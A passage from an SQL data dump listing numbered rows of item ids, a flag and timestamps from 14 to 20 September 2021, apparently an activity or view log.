04:26:03'),(33765,1582,1,'2021-09-14','2021-09-14 04:48:59'),(33766,1718,1,'2021-09-14','2021-09-14 05:30:53'),(33767,1610,1,'2021-09-14','2021-09-14 05:35:36'),(33768,1720,1,'2021-09-14','2021-09-14 05:54:19'),(33769,1588,1,'2021-09-14','2021-09-14 06:21:47'),(33770,1588,1,'2021-09-14','2021-09-14 07:00:08'),(33771,2704,1,'2021-09-14','2021-09-14 07:01:03'),(33772,3752,1,'2021-09-14','2021-09-14 07:11:57'),(33773,3781,1,'2021-09-14','2021-09-14 07:25:39'),(33774,1598,1,'2021-09-14','2021-09-14 07:32:15'),(33775,2991,1,'2021-09-14','2021-09-14 08:10:13'),(33776,1602,1,'2021-09-14','2021-09-14 09:26:13'),(33777,1602,1,'2021-09-14','2021-09-14 09:26:19'),(33778,1602,1,'2021-09-14','2021-09-14 09:26:39'),(33779,2410,1,'2021-09-14','2021-09-14 09:32:46'),(33780,3534,1,'2021-09-14','2021-09-14 10:39:45'),(33781,1728,1,'2021-09-14','2021-09-14 11:07:14'),(33782,2813,1,'2021-09-14','2021-09-14 11:10:14'),(33783,2503,1,'2021-09-14','2021-09-14 11:10:43'),(33784,1598,1,'2021-09-14','2021-09-14 11:19:42'),(33785,80,1,'2021-09-14','2021-09-14 12:05:00'),(33786,1718,1,'2021-09-14','2021-09-14 12:10:52'),(33787,2658,1,'2021-09-14','2021-09-14 12:18:33'),(33788,1582,1,'2021-09-14','2021-09-14 13:37:48'),(33789,2813,1,'2021-09-14','2021-09-14 13:53:41'),(33790,1588,1,'2021-09-14','2021-09-14 14:04:05'),(33791,1734,1,'2021-09-14','2021-09-14 14:08:37'),(33792,3691,1,'2021-09-14','2021-09-14 14:22:51'),(33793,2159,1,'2021-09-14','2021-09-14 14:39:00'),(33794,1598,1,'2021-09-14','2021-09-14 14:46:17'),(33795,1598,1,'2021-09-14','2021-09-14 14:46:18'),(33796,1606,1,'2021-09-14','2021-09-14 15:25:34'),(33797,89,1,'2021-09-14','2021-09-14 15:41:54'),(33798,1718,1,'2021-09-14','2021-09-14 15:48:14'),(33799,1718,1,'2021-09-14','2021-09-14 15:48:51'),(33800,1718,1,'2021-09-14','2021-09-14 15:49:01'),(33801,1718,1,'2021-09-14','2021-09-14 16:22:06'),(33802,1718,1,'2021-09-14','2021-09-14 16:25:26'),(33803,3752,1,'2021-09-14','2021-09-14 17:16:54'),(33804,80,1,'2021-09-14','2021-09-14 18:50:25'),(33805,2410,1,'2021-09-14','2021-09-14 18:51:41'),(33806,76,1,'2021-09-14','2021-09-14 19:16:13'),(33807,108,1,'2021-09-14','2021-09-14 19:17:20'),(33808,335,1,'2021-09-14','2021-09-14 19:33:27'),(33809,1596,1,'2021-09-14','2021-09-14 19:42:13'),(33810,472,1,'2021-09-14','2021-09-14 20:28:52'),(33811,2911,1,'2021-09-14','2021-09-14 20:52:29'),(33812,3267,1,'2021-09-14','2021-09-14 20:52:33'),(33813,1586,1,'2021-09-14','2021-09-14 20:58:38'),(33814,1602,1,'2021-09-14','2021-09-14 21:48:33'),(33815,1602,1,'2021-09-14','2021-09-14 22:38:37'),(33816,487,1,'2021-09-14','2021-09-14 22:47:19'),(33817,89,1,'2021-09-14','2021-09-14 22:49:30'),(33818,2904,1,'2021-09-14','2021-09-14 23:02:37'),(33819,3691,1,'2021-09-14','2021-09-14 23:59:04'),(33820,2813,1,'2021-09-15','2021-09-15 00:04:11'),(33821,3127,1,'2021-09-15','2021-09-15 00:31:14'),(33822,3056,1,'2021-09-15','2021-09-15 01:06:16'),(33823,1588,1,'2021-09-15','2021-09-15 01:24:50'),(33824,3489,1,'2021-09-15','2021-09-15 02:08:03'),(33825,2813,1,'2021-09-15','2021-09-15 02:53:05'),(33826,1608,1,'2021-09-15','2021-09-15 03:12:13'),(33827,1596,1,'2021-09-15','2021-09-15 04:34:13'),(33828,1718,1,'2021-09-15','2021-09-15 05:14:55'),(33829,3109,1,'2021-09-15','2021-09-15 06:03:11'),(33830,1718,1,'2021-09-15','2021-09-15 06:05:16'),(33831,1602,1,'2021-09-15','2021-09-15 06:14:56'),(33832,89,1,'2021-09-15','2021-09-15 06:48:22'),(33833,2704,1,'2021-09-15','2021-09-15 06:55:13'),(33834,3267,1,'2021-09-15','2021-09-15 06:55:57'),(33835,3438,1,'2021-09-15','2021-09-15 07:02:43'),(33836,3438,1,'2021-09-15','2021-09-15 07:32:59'),(33837,76,1,'2021-09-15','2021-09-15 07:36:36'),(33838,3691,1,'2021-09-15','2021-09-15 07:40:13'),(33839,1596,1,'2021-09-15','2021-09-15 08:06:04'),(33840,3127,1,'2021-09-15','2021-09-15 08:24:48'),(33841,3774,1,'2021-09-15','2021-09-15 08:54:43'),(33842,2813,1,'2021-09-15','2021-09-15 08:56:25'),(33843,2410,1,'2021-09-15','2021-09-15 09:47:01'),(33844,1749,1,'2021-09-15','2021-09-15 09:50:37'),(33845,68,1,'2021-09-15','2021-09-15 11:16:17'),(33846,2804,1,'2021-09-15','2021-09-15 12:27:43'),(33847,2148,1,'2021-09-15','2021-09-15 12:36:42'),(33848,1606,1,'2021-09-15','2021-09-15 12:36:57'),(33849,89,1,'2021-09-15','2021-09-15 12:37:36'),(33850,2503,1,'2021-09-15','2021-09-15 12:38:20'),(33851,2911,1,'2021-09-15','2021-09-15 12:47:55'),(33852,1749,1,'2021-09-15','2021-09-15 13:00:56'),(33853,3738,1,'2021-09-15','2021-09-15 13:19:35'),(33854,3746,1,'2021-09-15','2021-09-15 13:20:03'),(33855,3752,1,'2021-09-15','2021-09-15 13:20:03'),(33856,3749,1,'2021-09-15','2021-09-15 13:20:20'),(33857,1598,1,'2021-09-15','2021-09-15 13:46:42'),(33858,1598,1,'2021-09-15','2021-09-15 13:47:00'),(33859,3087,1,'2021-09-15','2021-09-15 13:52:58'),(33860,3087,1,'2021-09-15','2021-09-15 13:53:16'),(33861,3087,1,'2021-09-15','2021-09-15 13:54:20'),(33862,1608,1,'2021-09-15','2021-09-15 13:54:53'),(33863,89,1,'2021-09-15','2021-09-15 13:59:12'),(33864,89,1,'2021-09-15','2021-09-15 13:59:39'),(33865,89,1,'2021-09-15','2021-09-15 14:01:42'),(33866,89,1,'2021-09-15','2021-09-15 14:07:31'),(33867,1600,1,'2021-09-15','2021-09-15 14:30:44'),(33868,1600,1,'2021-09-15','2021-09-15 14:41:26'),(33869,1596,1,'2021-09-15','2021-09-15 14:59:53'),(33870,1724,1,'2021-09-15','2021-09-15 15:14:28'),(33871,89,1,'2021-09-15','2021-09-15 15:22:10'),(33872,3313,1,'2021-09-15','2021-09-15 15:24:08'),(33873,1718,1,'2021-09-15','2021-09-15 15:36:44'),(33874,570,1,'2021-09-15','2021-09-15 15:39:42'),(33875,1588,1,'2021-09-15','2021-09-15 15:39:44'),(33876,1598,1,'2021-09-15','2021-09-15 16:57:59'),(33877,2904,1,'2021-09-15','2021-09-15 17:00:35'),(33878,1598,1,'2021-09-15','2021-09-15 17:01:10'),(33879,3273,1,'2021-09-15','2021-09-15 17:09:42'),(33880,1596,1,'2021-09-15','2021-09-15 17:26:41'),(33881,1598,1,'2021-09-15','2021-09-15 17:33:44'),(33882,2704,1,'2021-09-15','2021-09-15 17:38:51'),(33883,3273,1,'2021-09-15','2021-09-15 18:39:47'),(33884,1749,1,'2021-09-15','2021-09-15 19:24:42'),(33885,1598,1,'2021-09-15','2021-09-15 19:39:02'),(33886,3752,1,'2021-09-15','2021-09-15 19:39:45'),(33887,1718,1,'2021-09-15','2021-09-15 19:40:39'),(33888,2609,1,'2021-09-15','2021-09-15 20:17:25'),(33889,1588,1,'2021-09-15','2021-09-15 20:18:38'),(33890,3243,1,'2021-09-15','2021-09-15 20:18:41'),(33891,108,1,'2021-09-15','2021-09-15 22:38:53'),(33892,1612,1,'2021-09-15','2021-09-15 22:43:09'),(33893,3253,1,'2021-09-15','2021-09-15 22:55:41'),(33894,2813,1,'2021-09-15','2021-09-15 23:08:53'),(33895,3069,1,'2021-09-15','2021-09-15 23:19:08'),(33896,89,1,'2021-09-15','2021-09-15 23:31:00'),(33897,3479,1,'2021-09-15','2021-09-15 23:55:52'),(33898,3479,1,'2021-09-16','2021-09-16 00:25:49'),(33899,1600,1,'2021-09-16','2021-09-16 00:39:49'),(33900,1606,1,'2021-09-16','2021-09-16 00:43:15'),(33901,1724,1,'2021-09-16','2021-09-16 00:53:04'),(33902,2410,1,'2021-09-16','2021-09-16 01:10:46'),(33903,1872,1,'2021-09-16','2021-09-16 01:24:53'),(33904,1718,1,'2021-09-16','2021-09-16 01:41:08'),(33905,1592,1,'2021-09-16','2021-09-16 02:14:45'),(33906,3691,1,'2021-09-16','2021-09-16 02:19:56'),(33907,3691,1,'2021-09-16','2021-09-16 02:46:54'),(33908,3045,1,'2021-09-16','2021-09-16 02:55:07'),(33909,1596,1,'2021-09-16','2021-09-16 03:12:05'),(33910,3771,1,'2021-09-16','2021-09-16 05:11:27'),(33911,3698,1,'2021-09-16','2021-09-16 05:22:36'),(33912,1594,1,'2021-09-16','2021-09-16 05:33:50'),(33913,1604,1,'2021-09-16','2021-09-16 05:45:11'),(33914,1544,1,'2021-09-16','2021-09-16 06:11:03'),(33915,1604,1,'2021-09-16','2021-09-16 06:14:46'),(33916,1588,1,'2021-09-16','2021-09-16 06:20:38'),(33917,1606,1,'2021-09-16','2021-09-16 06:20:39'),(33918,89,1,'2021-09-16','2021-09-16 06:45:33'),(33919,89,1,'2021-09-16','2021-09-16 06:50:55'),(33920,1588,1,'2021-09-16','2021-09-16 07:31:44'),(33921,2813,1,'2021-09-16','2021-09-16 08:30:30'),(33922,2309,1,'2021-09-16','2021-09-16 09:41:30'),(33923,2309,1,'2021-09-16','2021-09-16 09:45:02'),(33924,1724,1,'2021-09-16','2021-09-16 09:54:59'),(33925,1592,1,'2021-09-16','2021-09-16 11:27:44'),(33926,1711,1,'2021-09-16','2021-09-16 12:18:13'),(33927,1711,1,'2021-09-16','2021-09-16 12:18:37'),(33928,1711,1,'2021-09-16','2021-09-16 12:18:48'),(33929,2503,1,'2021-09-16','2021-09-16 12:22:42'),(33930,3045,1,'2021-09-16','2021-09-16 12:49:50'),(33931,3069,1,'2021-09-16','2021-09-16 13:09:58'),(33932,91,1,'2021-09-16','2021-09-16 13:28:30'),(33933,1722,1,'2021-09-16','2021-09-16 13:34:42'),(33934,1600,1,'2021-09-16','2021-09-16 13:34:48'),(33935,1722,1,'2021-09-16','2021-09-16 13:35:06'),(33936,1722,1,'2021-09-16','2021-09-16 13:35:14'),(33937,68,1,'2021-09-16','2021-09-16 13:35:46'),(33938,68,1,'2021-09-16','2021-09-16 13:46:19'),(33939,2558,1,'2021-09-16','2021-09-16 13:50:22'),(33940,3698,1,'2021-09-16','2021-09-16 14:26:07'),(33941,1604,1,'2021-09-16','2021-09-16 14:47:53'),(33942,1596,1,'2021-09-16','2021-09-16 15:11:20'),(33943,1596,1,'2021-09-16','2021-09-16 15:17:02'),(33944,1774,1,'2021-09-16','2021-09-16 15:32:27'),(33945,3092,1,'2021-09-16','2021-09-16 16:13:58'),(33946,3771,1,'2021-09-16','2021-09-16 16:16:10'),(33947,1586,1,'2021-09-16','2021-09-16 16:49:47'),(33948,1544,1,'2021-09-16','2021-09-16 16:51:49'),(33949,1606,1,'2021-09-16','2021-09-16 18:41:43'),(33950,1588,1,'2021-09-16','2021-09-16 19:01:46'),(33951,1724,1,'2021-09-16','2021-09-16 19:41:42'),(33952,1724,1,'2021-09-16','2021-09-16 20:25:50'),(33953,1588,1,'2021-09-16','2021-09-16 20:52:53'),(33954,2813,1,'2021-09-16','2021-09-16 21:22:59'),(33955,4275,1,'2021-09-16','2021-09-16 21:25:25'),(33956,3764,1,'2021-09-16','2021-09-16 21:47:37'),(33957,1592,1,'2021-09-16','2021-09-16 21:48:55'),(33958,1608,1,'2021-09-16','2021-09-16 21:50:45'),(33959,1544,1,'2021-09-16','2021-09-16 22:02:55'),(33960,89,1,'2021-09-16','2021-09-16 22:33:28'),(33961,1608,1,'2021-09-16','2021-09-16 22:38:14'),(33962,1718,1,'2021-09-16','2021-09-16 23:31:45'),(33963,1600,1,'2021-09-16','2021-09-16 23:40:50'),(33964,1606,1,'2021-09-17','2021-09-17 00:04:08'),(33965,1606,1,'2021-09-17','2021-09-17 00:04:11'),(33966,3045,1,'2021-09-17','2021-09-17 00:32:50'),(33967,1596,1,'2021-09-17','2021-09-17 00:53:20'),(33968,1612,1,'2021-09-17','2021-09-17 01:46:03'),(33969,80,1,'2021-09-17','2021-09-17 01:47:23'),(33970,1612,1,'2021-09-17','2021-09-17 01:51:17'),(33971,1544,1,'2021-09-17','2021-09-17 02:44:16'),(33972,1588,1,'2021-09-17','2021-09-17 04:25:47'),(33973,2558,1,'2021-09-17','2021-09-17 05:25:27'),(33974,89,1,'2021-09-17','2021-09-17 05:50:52'),(33975,3278,1,'2021-09-17','2021-09-17 06:59:59'),(33976,1870,1,'2021-09-17','2021-09-17 08:59:19'),(33977,1600,1,'2021-09-17','2021-09-17 09:05:46'),(33978,2801,1,'2021-09-17','2021-09-17 09:15:12'),(33979,1592,1,'2021-09-17','2021-09-17 10:33:42'),(33980,1602,1,'2021-09-17','2021-09-17 10:47:53'),(33981,68,1,'2021-09-17','2021-09-17 10:49:42'),(33982,80,1,'2021-09-17','2021-09-17 10:50:10'),(33983,68,1,'2021-09-17','2021-09-17 10:52:32'),(33984,1594,1,'2021-09-17','2021-09-17 11:19:40'),(33985,2503,1,'2021-09-17','2021-09-17 11:36:18'),(33986,1594,1,'2021-09-17','2021-09-17 11:46:29'),(33987,2457,1,'2021-09-17','2021-09-17 12:03:39'),(33988,1592,1,'2021-09-17','2021-09-17 13:18:15'),(33989,1596,1,'2021-09-17','2021-09-17 13:34:17'),(33990,1606,1,'2021-09-17','2021-09-17 13:45:15'),(33991,3498,1,'2021-09-17','2021-09-17 13:46:46'),(33992,2911,1,'2021-09-17','2021-09-17 14:14:55'),(33993,89,1,'2021-09-17','2021-09-17 14:56:39'),(33994,3764,1,'2021-09-17','2021-09-17 15:00:29'),(33995,2156,1,'2021-09-17','2021-09-17 16:33:48'),(33996,1870,1,'2021-09-17','2021-09-17 16:46:59'),(33997,3781,1,'2021-09-17','2021-09-17 17:38:05'),(33998,76,1,'2021-09-17','2021-09-17 17:47:01'),(33999,2503,1,'2021-09-17','2021-09-17 17:48:15'),(34000,87,1,'2021-09-17','2021-09-17 17:48:25'),(34001,1592,1,'2021-09-17','2021-09-17 18:15:58'),(34002,1600,1,'2021-09-17','2021-09-17 18:42:54'),(34003,1586,1,'2021-09-17','2021-09-17 18:43:06'),(34004,3045,1,'2021-09-17','2021-09-17 19:28:42'),(34005,1582,1,'2021-09-17','2021-09-17 19:41:28'),(34006,3045,1,'2021-09-17','2021-09-17 19:50:01'),(34007,80,1,'2021-09-17','2021-09-17 19:59:50'),(34008,1602,1,'2021-09-17','2021-09-17 20:06:09'),(34009,1582,1,'2021-09-17','2021-09-17 20:29:52'),(34010,1582,1,'2021-09-17','2021-09-17 20:30:19'),(34011,1602,1,'2021-09-17','2021-09-17 20:56:26'),(34012,1728,1,'2021-09-17','2021-09-17 20:58:34'),(34013,1728,1,'2021-09-17','2021-09-17 21:01:15'),(34014,3664,1,'2021-09-17','2021-09-17 22:06:49'),(34015,2457,1,'2021-09-17','2021-09-17 22:39:23'),(34016,2813,1,'2021-09-18','2021-09-18 00:42:52'),(34017,3124,1,'2021-09-18','2021-09-18 00:45:02'),(34018,472,1,'2021-09-18','2021-09-18 00:49:52'),(34019,1741,1,'2021-09-18','2021-09-18 00:56:39'),(34020,1877,1,'2021-09-18','2021-09-18 01:08:09'),(34021,1588,1,'2021-09-18','2021-09-18 01:22:54'),(34022,80,1,'2021-09-18','2021-09-18 01:45:59'),(34023,1602,1,'2021-09-18','2021-09-18 02:33:24'),(34024,1588,1,'2021-09-18','2021-09-18 03:13:16'),(34025,3069,1,'2021-09-18','2021-09-18 04:13:44'),(34026,1604,1,'2021-09-18','2021-09-18 04:33:45'),(34027,89,1,'2021-09-18','2021-09-18 05:09:34'),(34028,1586,1,'2021-09-18','2021-09-18 05:09:45'),(34029,1612,1,'2021-09-18','2021-09-18 05:27:48'),(34030,1695,1,'2021-09-18','2021-09-18 05:31:57'),(34031,1741,1,'2021-09-18','2021-09-18 06:08:15'),(34032,1612,1,'2021-09-18','2021-09-18 06:30:44'),(34033,1582,1,'2021-09-18','2021-09-18 06:53:14'),(34034,1596,1,'2021-09-18','2021-09-18 07:30:54'),(34035,1544,1,'2021-09-18','2021-09-18 08:20:51'),(34036,1614,1,'2021-09-18','2021-09-18 08:23:14'),(34037,2503,1,'2021-09-18','2021-09-18 08:41:27'),(34038,2609,1,'2021-09-18','2021-09-18 09:29:09'),(34039,68,1,'2021-09-18','2021-09-18 09:30:17'),(34040,80,1,'2021-09-18','2021-09-18 09:30:36'),(34041,68,1,'2021-09-18','2021-09-18 09:31:36'),(34042,2609,1,'2021-09-18','2021-09-18 09:31:45'),(34043,470,1,'2021-09-18','2021-09-18 09:51:58'),(34044,472,1,'2021-09-18','2021-09-18 11:23:16'),(34045,87,1,'2021-09-18','2021-09-18 12:09:49'),(34046,488,1,'2021-09-18','2021-09-18 12:21:39'),(34047,87,1,'2021-09-18','2021-09-18 12:21:50'),(34048,84,1,'2021-09-18','2021-09-18 12:22:33'),(34049,3691,1,'2021-09-18','2021-09-18 12:22:46'),(34050,84,1,'2021-09-18','2021-09-18 12:22:56'),(34051,89,1,'2021-09-18','2021-09-18 13:07:10'),(34052,1610,1,'2021-09-18','2021-09-18 14:36:13'),(34053,1720,1,'2021-09-18','2021-09-18 14:52:50'),(34054,1586,1,'2021-09-18','2021-09-18 14:54:59'),(34055,1612,1,'2021-09-18','2021-09-18 15:40:00'),(34056,3038,1,'2021-09-18','2021-09-18 15:53:22'),(34057,469,1,'2021-09-18','2021-09-18 16:02:28'),(34058,1614,1,'2021-09-18','2021-09-18 16:13:47'),(34059,84,1,'2021-09-18','2021-09-18 16:21:55'),(34060,3694,1,'2021-09-18','2021-09-18 16:22:16'),(34061,84,1,'2021-09-18','2021-09-18 16:22:28'),(34062,1877,1,'2021-09-18','2021-09-18 16:22:51'),(34063,84,1,'2021-09-18','2021-09-18 16:23:07'),(34064,68,1,'2021-09-18','2021-09-18 16:25:06'),(34065,76,1,'2021-09-18','2021-09-18 16:25:47'),(34066,68,1,'2021-09-18','2021-09-18 16:26:18'),(34067,80,1,'2021-09-18','2021-09-18 16:26:24'),(34068,2410,1,'2021-09-18','2021-09-18 16:26:32'),(34069,2411,1,'2021-09-18','2021-09-18 16:26:48'),(34070,2410,1,'2021-09-18','2021-09-18 16:26:59'),(34071,80,1,'2021-09-18','2021-09-18 16:27:09'),(34072,2410,1,'2021-09-18','2021-09-18 16:29:07'),(34073,1604,1,'2021-09-18','2021-09-18 16:36:17'),(34074,2309,1,'2021-09-18','2021-09-18 16:47:36'),(34075,3127,1,'2021-09-18','2021-09-18 16:58:43'),(34076,3746,1,'2021-09-18','2021-09-18 17:09:59'),(34077,2309,1,'2021-09-18','2021-09-18 17:32:32'),(34078,1588,1,'2021-09-18','2021-09-18 17:32:33'),(34079,2410,1,'2021-09-18','2021-09-18 17:46:17'),(34080,108,1,'2021-09-18','2021-09-18 17:46:25'),(34081,2503,1,'2021-09-18','2021-09-18 17:49:02'),(34082,80,1,'2021-09-18','2021-09-18 17:50:29'),(34083,2813,1,'2021-09-18','2021-09-18 18:22:47'),(34084,1720,1,'2021-09-18','2021-09-18 18:53:03'),(34085,80,1,'2021-09-18','2021-09-18 19:02:28'),(34086,72,1,'2021-09-18','2021-09-18 19:49:56'),(34087,80,1,'2021-09-18','2021-09-18 19:51:18'),(34088,1588,1,'2021-09-18','2021-09-18 20:33:19'),(34089,89,1,'2021-09-18','2021-09-18 21:01:54'),(34090,72,1,'2021-09-18','2021-09-18 21:51:19'),(34091,2457,1,'2021-09-18','2021-09-18 22:47:28'),(34092,3038,1,'2021-09-18','2021-09-18 23:03:45'),(34093,2457,1,'2021-09-18','2021-09-18 23:23:39'),(34094,1718,1,'2021-09-18','2021-09-18 23:33:11'),(34095,2503,1,'2021-09-18','2021-09-18 23:33:15'),(34096,3781,1,'2021-09-18','2021-09-18 23:41:33'),(34097,80,1,'2021-09-18','2021-09-18 23:58:52'),(34098,1720,1,'2021-09-19','2021-09-19 00:17:39'),(34099,2503,1,'2021-09-19','2021-09-19 00:37:41'),(34100,469,1,'2021-09-19','2021-09-19 01:27:48'),(34101,1606,1,'2021-09-19','2021-09-19 01:38:40'),(34102,3090,1,'2021-09-19','2021-09-19 01:39:00'),(34103,1612,1,'2021-09-19','2021-09-19 01:56:32'),(34104,3109,1,'2021-09-19','2021-09-19 02:28:29'),(34105,80,1,'2021-09-19','2021-09-19 02:41:32'),(34106,3038,1,'2021-09-19','2021-09-19 02:58:18'),(34107,2617,1,'2021-09-19','2021-09-19 03:04:00'),(34108,482,1,'2021-09-19','2021-09-19 03:18:30'),(34109,1586,1,'2021-09-19','2021-09-19 03:26:31'),(34110,2813,1,'2021-09-19','2021-09-19 03:28:39'),(34111,2178,1,'2021-09-19','2021-09-19 03:48:42'),(34112,1600,1,'2021-09-19','2021-09-19 03:48:57'),(34113,72,1,'2021-09-19','2021-09-19 03:52:31'),(34114,2617,1,'2021-09-19','2021-09-19 04:03:05'),(34115,1872,1,'2021-09-19','2021-09-19 04:33:57'),(34116,3675,1,'2021-09-19','2021-09-19 04:39:32'),(34117,1588,1,'2021-09-19','2021-09-19 04:48:47'),(34118,1872,1,'2021-09-19','2021-09-19 05:18:58'),(34119,3675,1,'2021-09-19','2021-09-19 05:22:03'),(34120,89,1,'2021-09-19','2021-09-19 05:53:38'),(34121,3287,1,'2021-09-19','2021-09-19 05:54:00'),(34122,1739,1,'2021-09-19','2021-09-19 06:03:57'),(34123,1614,1,'2021-09-19','2021-09-19 06:04:36'),(34124,3287,1,'2021-09-19','2021-09-19 06:47:10'),(34125,1614,1,'2021-09-19','2021-09-19 07:08:24'),(34126,1586,1,'2021-09-19','2021-09-19 07:19:03'),(34127,469,1,'2021-09-19','2021-09-19 07:29:42'),(34128,3045,1,'2021-09-19','2021-09-19 07:33:59'),(34129,1598,1,'2021-09-19','2021-09-19 07:40:22'),(34130,1588,1,'2021-09-19','2021-09-19 08:09:28'),(34131,80,1,'2021-09-19','2021-09-19 08:22:16'),(34132,80,1,'2021-09-19','2021-09-19 08:33:55'),(34133,1598,1,'2021-09-19','2021-09-19 08:40:58'),(34134,1606,1,'2021-09-19','2021-09-19 08:42:26'),(34135,1606,1,'2021-09-19','2021-09-19 08:42:45'),(34136,68,1,'2021-09-19','2021-09-19 11:11:12'),(34137,1718,1,'2021-09-19','2021-09-19 11:12:49'),(34138,2503,1,'2021-09-19','2021-09-19 12:06:46'),(34139,2503,1,'2021-09-19','2021-09-19 12:11:10'),(34140,473,1,'2021-09-19','2021-09-19 12:13:43'),(34141,1606,1,'2021-09-19','2021-09-19 12:42:27'),(34142,89,1,'2021-09-19','2021-09-19 13:01:32'),(34143,1588,1,'2021-09-19','2021-09-19 13:21:41'),(34144,80,1,'2021-09-19','2021-09-19 14:08:42'),(34145,3290,1,'2021-09-19','2021-09-19 14:34:01'),(34146,2503,1,'2021-09-19','2021-09-19 14:34:31'),(34147,2813,1,'2021-09-19','2021-09-19 14:52:15'),(34148,1596,1,'2021-09-19','2021-09-19 15:02:17'),(34149,2410,1,'2021-09-19','2021-09-19 15:43:01'),(34150,2503,1,'2021-09-19','2021-09-19 16:01:37'),(34151,68,1,'2021-09-19','2021-09-19 17:45:09'),(34152,2809,1,'2021-09-19','2021-09-19 17:58:31'),(34153,2617,1,'2021-09-19','2021-09-19 18:04:54'),(34154,80,1,'2021-09-19','2021-09-19 18:17:52'),(34155,1602,1,'2021-09-19','2021-09-19 18:18:32'),(34156,1608,1,'2021-09-19','2021-09-19 18:19:59'),(34157,2617,1,'2021-09-19','2021-09-19 18:43:29'),(34158,2159,1,'2021-09-19','2021-09-19 18:55:30'),(34159,1745,1,'2021-09-19','2021-09-19 18:55:31'),(34160,1745,1,'2021-09-19','2021-09-19 19:05:04'),(34161,3034,1,'2021-09-19','2021-09-19 19:25:38'),(34162,2809,1,'2021-09-19','2021-09-19 19:26:36'),(34163,1586,1,'2021-09-19','2021-09-19 19:35:49'),(34164,1598,1,'2021-09-19','2021-09-19 19:37:23'),(34165,3090,1,'2021-09-19','2021-09-19 19:48:11'),(34166,1604,1,'2021-09-19','2021-09-19 20:18:12'),(34167,3664,1,'2021-09-19','2021-09-19 20:25:31'),(34168,72,1,'2021-09-19','2021-09-19 20:39:29'),(34169,3060,1,'2021-09-19','2021-09-19 20:48:09'),(34170,2150,1,'2021-09-19','2021-09-19 21:10:31'),(34171,89,1,'2021-09-19','2021-09-19 22:00:01'),(34172,1588,1,'2021-09-19','2021-09-19 22:43:05'),(34173,2617,1,'2021-09-19','2021-09-19 23:19:12'),(34174,1596,1,'2021-09-20','2021-09-20 01:14:03'),(34175,2813,1,'2021-09-20','2021-09-20 01:54:33'),(34176,3774,1,'2021-09-20','2021-09-20 02:19:02'),(34177,3771,1,'2021-09-20','2021-09-20 02:19:03'),(34178,3777,1,'2021-09-20','2021-09-20 02:19:05'),(34179,3764,1,'2021-09-20','2021-09-20 02:19:06'),(34180,4275,1,'2021-09-20','2021-09-20 02:19:26'),(34181,1718,1,'2021-09-20','2021-09-20 02:24:54'),(34182,80,1,'2021-09-20','2021-09-20 02:37:06'),(34183,3282,1,'2021-09-20','2021-09-20 02:38:47'),(34184,3282,1,'2021-09-20','2021-09-20 02:44:56'),(34185,3282,1,'2021-09-20','2021-09-20 02:45:18'),(34186,1594,1,'2021-09-20','2021-09-20 03:22:06'),(34187,1588,1,'2021-09-20','2021-09-20 03:25:35'),(34188,72,1,'2021-09-20','2021-09-20 04:06:07'),(34189,1728,1,'2021-09-20','2021-09-20 04:45:42'),(34190,478,1,'2021-09-20','2021-09-20 05:22:06'),(34191,3800,1,'2021-09-20','2021-09-20 06:29:23'),(34192,1588,1,'2021-09-20','2021-09-20 08:03:24'),(34193,1604,1,'2021-09-20','2021-09-20 08:47:07'),(34194,3764,1,'2021-09-20','2021-09-20 09:54:39'),(34195,3051,1,'2021-09-20','2021-09-20 10:00:46'),(34196,2159,1,'2021-09-20','2021-09-20 10:00:57'),(34197,3764,1,'2021-09-20','2021-09-20 10:05:55'),(34198,2617,1,'2021-09-20','2021-09-20 10:17:09'),(34199,72,1,'2021-09-20','2021-09-20 10:22:33'),(34200,1602,1,'2021-09-20','2021-09-20 10:28:23'),(34201,1608,1,'2021-09-20','2021-09-20 10:33:03'),(34202,2503,1,'2021-09-20','2021-09-20 10:34:53'),(34203,72,1,'2021-09-20','2021-09-20 10:35:22'),(34204,3127,1,'2021-09-20','2021-09-20 10:39:40'),(34205,2503,1,'2021-09-20','2021-09-20 10:49:59'),(34206,3290,1,'2021-09-20','2021-09-20 10:50:53'),(34207,2503,1,'2021-09-20','2021-09-20 10:56:24'),(34208,2813,1,'2021-09-20','2021-09-20 11:03:41'),(34209,72,1,'2021-09-20','2021-09-20 12:35:04'),(34210,91,1,'2021-09-20','2021-09-20 12:43:59'),(34211,3710,1,'2021-09-20','2021-09-20 13:02:36'),(34212,3781,1,'2021-09-20','2021-09-20 13:19:53'),(34213,3764,1,'2021-09-20','2021-09-20 13:20:36'),(34214,3178,1,'2021-09-20','2021-09-20 13:33:26'),(34215,1718,1,'2021-09-20','2021-09-20 13:44:21'),(34216,89,1,'2021-09-20','2021-09-20 14:04:01'),(34217,72,1,'2021-09-20','2021-09-20 14:05:05'),(34218,3791,1,'2021-09-20','2021-09-20 14:05:32'),(34219,89,1,'2021-09-20','2021-09-20 14:14:37'),(34220,1596,1,'2021-09-20','2021-09-20 14:34:35'),(34221,80,1,'2021-09-20','2021-09-20 16:29:47'),(34222,87,1,'2021-09-20','2021-09-20 16:51:56'),(34223,80,1,'2021-09-20','2021-09-20 16:52:55'),(34224,89,1,'2021-09-20','2021-09-20 16:53:03'),(34225,89,1,'2021-09-20','2021-09-20 16:53:19'),(34226,89,1,'2021-09-20','2021-09-20 16:53:37'),(34227,89,1,'2021-09-20','2021-09-20 16:53:57'),(34228,4301,1,'2021-09-20','2021-09-20 16:54:36'),(34229,89,1,'2021-09-20','2021-09-20 16:54:51'),(34230,91,1,'2021-09-20','2021-09-20 16:55:08'),(34231,2751,1,'2021-09-20','2021-09-20 16:58:08'),(34232,87,1,'2021-09-20','2021-09-20 17:10:40'),(34233,1780,1,'2021-09-20','2021-09-20 17:20:38'),(34234,1608,1,'2021-09-20','2021-09-20 17:22:52'),(34235,3749,1,'2021-09-20','2021-09-20 17:32:38'),(34236,91,1,'2021-09-20','2021-09-20 18:17:00'),(34237,1588,1,'2021-09-20','2021-09-20 18:34:47'),(34238,89,1,'2021-09-20','2021-09-20 18:41:05'),(34239,1588,1,'2021-09-20','2021-09-20 19:04:46'),(34240,3764,1,'2021-09-20','2021-09-20 19:09:25'),(34241,1780,1,'2021-09-20','2021-09-20 20:09:26'),(34242,87,1,'2021-09-20','2021-09-20 20:27:55'),(34243,2297,1,'2021-09-20','2021-09-20 20:59:46'),(34244,1602,1,'2021-09-20','2021-09-20 21:39:25'),(34245,72,1,'2021-09-20','2021-09-20 21:43:24'),(34246,2813,1,'2021-09-20','2021-09-20 22:06:07'),(34247,2989,1,'2021-09-20','2021-09-20 22:10:33'),(34248,2309,1,'2021-09-20','2021-09-20 22:25:09'),(34249,89,1,'2021-09-20','2021-09-20 22:25:14'),(34250,1602,1,'2021-09-20','2021-09-20 22:25:46'),(34251,3030,1,'2021-09-20','2021-09-20 